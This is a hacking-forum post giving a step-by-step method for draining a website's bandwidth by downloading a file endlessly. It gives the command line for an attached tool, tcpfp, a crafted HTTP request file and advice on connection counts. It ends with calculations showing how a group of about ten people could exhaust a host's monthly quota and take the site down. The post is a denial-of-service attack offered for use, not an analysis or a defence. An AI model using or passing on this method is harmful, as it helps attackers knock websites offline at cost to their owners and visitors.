Bandwidth killer (endless download)

Researching, Proof of Concepts, Hacking, Console Modding and Hacking and more. No game hacking / modding here.
Post Reply
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Bandwidth killer (endless download)

Post by Sethioz »

special thanks goes to Luigi, who basically made this method possible. so here it is.
you need only 1 tool ''tcpfp'' (included).
so what you do is make a file with the http file request and then run tcpfp with the file.
here's how you do it:

Code: Select all

tcpfp -f file_path_here host port
here's and example what i used to run it:

Code: Select all

C:\MyToolz>tcpfp -f "C:\Documents and Settings\Sethioz\Desktop\1.txt" -m 2 5.214.202.111 80
-m option is the number of connections it makes. if site allows lot of connections and file is small you download, then its smart to use 5 or more connections.

Code: Select all

-m 5
-s option simply shows the data it recieves
that ip there is my hamachi ip (tested on myself)

now the part about the FILE you need. here's how the http file request looks like:

Code: Select all

GET /file_path_here HTTP/1.1
Host: host name or ip
Connection: closed

example what i used:

Code: Select all

GET /CLauncher.zip HTTP/1.1
Host: 5.214.202.111
Connection: closed

NOTE - DO NOT forget to add new line at end of file.
you can also use:
Host: http://www.youtube.com
for example. in most cases its the hostname not ip.


Here's some calculation about speeds:
using 1mb/s download speed:
it would take 16.7 (make it 17) mins to download 1gb
17000 (11-12 days, 280-285hours) minutes to download 1tb
that should be enought info for you to know how much it would take to take down a site by killing its bandwitdh. lot of hostings have unlimited bandwitdh, but lot of hostings that has limit, has it under 5tb per month, which is quite doable with 10 or more ppl. would take like 2-10 days. usually hostings have like 1-3tb bandwitdh per month.
Attachments
tcpfp.rar
(5.68 KiB) Downloaded 430 times
Post Reply